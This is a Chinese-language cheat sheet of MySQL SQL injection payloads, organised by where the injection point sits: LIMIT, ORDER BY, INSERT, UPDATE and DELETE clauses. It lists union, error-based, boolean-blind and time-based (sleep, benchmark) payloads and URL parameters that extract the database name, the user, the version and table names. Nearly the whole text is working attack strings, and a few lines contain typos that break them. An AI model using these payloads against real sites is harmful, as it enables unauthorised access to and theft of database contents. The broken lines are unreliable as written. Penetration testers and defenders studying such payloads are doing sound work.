limit注入
limit 注入这个词是按注入点所在的位置来划分的。
where id=xx 后面的, 也可以叫做 where注入。
limit union注入
没有order by 的情况 SQL: select * from users where id <= 100 limit 1 union select 1,2,3 -- ,1 ?p=1 union select 1,2,3 --+ ?p=1 union select 1,(SELECT table_name from information_schema.TABLES WHERE table_schema=DATABASE() LIMIT 2,1),3 --+ 查列数的方法: ?p=1 into @,@,@ --+
limit union 延时注入
没有order by的情况 if(substr(database() from 1 for 1)=0x73,sleep(5),0) ?p=1 union select 1,if(substr(database() from 1 for 1)='s',sleep(5),0),3--+
order by limit报错注入
仅适用于 MySQL 5.x 系列中版本低于 5.6.6 的情况（该行为在后续版本中已被移除）。
SQL: SELECT * FROM users WHERE id<10 order by id LIMIT 1,1
procedure analyse(extractvalue(rand(),concat(0x3a,user())),1); ?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1) --+
order by limit 报错延时注入
PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(50000000,SHA1(1)),1))))),1);# ?id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(50000000,SHA1(1)),1))))),1);--+
order by 注入
SQL:select * from users where id <= 100 order by 1
报错注入 select * from users where id<=100 order by 1,updatexml(1,concat(0x7e,(select user()),0x7e),1);
order by的 case布尔盲注入 select * from users where id<=100 order by 1 rlike (case substr(database(),1,1) when 's' then 1 else 0x28 end)--+
order by的 if布尔注入 select * from users where id<=100 order by if((1=2),1,(select id from information_schema.tables));
insert 注入
常规注入(有回显) 222",(select schema_name from information_schema.schemata limit 1,1))--+
报错注入 222",(Select 1 from (Select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group byx)x))--
if延时注入 222",(if(substr(DATABASE()from 1 for 1)='m',SLEEP(5),1)));--+
update 注入
报错注入 update users set password='aaaxxxxb' where username='222' And (Select1from(Select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)x);--+
布尔注入 update users set password='ab'where username='ad2' And (if(1=2,1,0));--+
布尔延时 update users set password='xx' where username='ad2' And 1-(if((substr(database(),1,1)='s'),sleep(5),1));--+
delete 注入
报错注入 delete from users where username="ad2" And ((Select 1 from (Select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)x));-- a
布尔注入 delete from users where username="ad2" And (if((substr),0,1));-- a
布尔延时注入 delete from users where username="ad2" And 1-(if((substr(version(),1,1)='5'),sleep(5),1));-- a